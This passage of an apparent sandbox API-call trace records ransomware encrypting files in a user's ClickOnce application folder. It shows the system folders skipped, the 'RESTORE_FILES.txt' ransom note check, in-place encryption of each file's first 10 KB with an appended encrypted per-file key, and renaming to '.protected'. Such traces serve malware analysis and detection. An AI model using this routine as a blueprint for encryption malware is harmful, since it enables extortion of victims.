halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.131] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".txt") returned 0x0 [0078.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.131] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".rar") returned 0x0 [0078.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.131] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".zip") returned 0x0 [0078.131] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.146] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 
1 [0078.146] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.146] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.147] CloseHandle (hObject=0x158) returned 1 [0078.147] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.protected") returned 171 [0078.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.protected")) returned 1 [0078.147] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="Windows") returned -1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="Program Files") returned -1 [0078.147] lstrcmpiW 
(lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.147] lstrcmpiW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="System Volume Information") returned -1 [0078.147] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrIW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".protected") returned 0x0 [0078.148] lstrcmpW (lpString1="clickonce_bootstrap.exe.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".txt") 
returned 0x0 [0078.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".rar") returned 0x0 [0078.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0078.148] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".zip") returned 0x0 [0078.148] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.152] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.152] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.152] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.152] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.153] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.153] CloseHandle (hObject=0x158) returned 1 [0078.153] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.protected") returned 178 [0078.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.protected")) returned 1 [0078.154] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="Windows") returned -1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="Program Files") returned -1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="Program Files (x86)") returned -1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="$Recycle.bin") returned 1 [0078.154] lstrcmpiW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="System Volume Information") returned -1 [0078.154] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrIW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".protected") returned 0x0 [0078.154] lstrcmpW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".txt") returned 0x0 [0078.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".rar") returned 0x0 [0078.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".zip") returned 0x0 [0078.154] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.161] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.161] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.161] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.161] CloseHandle (hObject=0x158) returned 1 [0078.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.protected") returned 180 [0078.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.protected")) returned 1 [0078.162] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="Windows") returned -1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="Program Files") returned -1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="System Volume Information") returned -1 [0078.162] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.162] StrStrIW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".protected") returned 0x0 [0078.162] lstrcmpW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.162] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.163] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".txt") returned 0x0 [0078.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.163] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".rar") returned 0x0 [0078.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.163] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".zip") returned 0x0 [0078.163] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: 
lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0xee0, lpOverlapped=0x0) returned 1 [0078.164] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff120, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.164] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0xee0, lpOverlapped=0x0) returned 1 [0078.165] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.165] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.165] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.165] CloseHandle (hObject=0x158) returned 1 [0078.165] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.protected") returned 183 [0078.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.protected")) returned 1 [0078.166] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="Windows") returned -1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="Program Files") returned -1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="Program Files (x86)") returned -1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="$Recycle.bin") returned 1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="System Volume Information") returned -1 [0078.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.166] StrStrIW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".protected") returned 0x0 [0078.166] lstrcmpW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.166] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.166] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.167] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".txt") returned 0x0 [0078.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.167] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".rar") returned 0x0 [0078.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.167] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".zip") returned 0x0 [0078.167] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x560, lpOverlapped=0x0) returned 1 [0078.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffaa0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.168] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x560, 
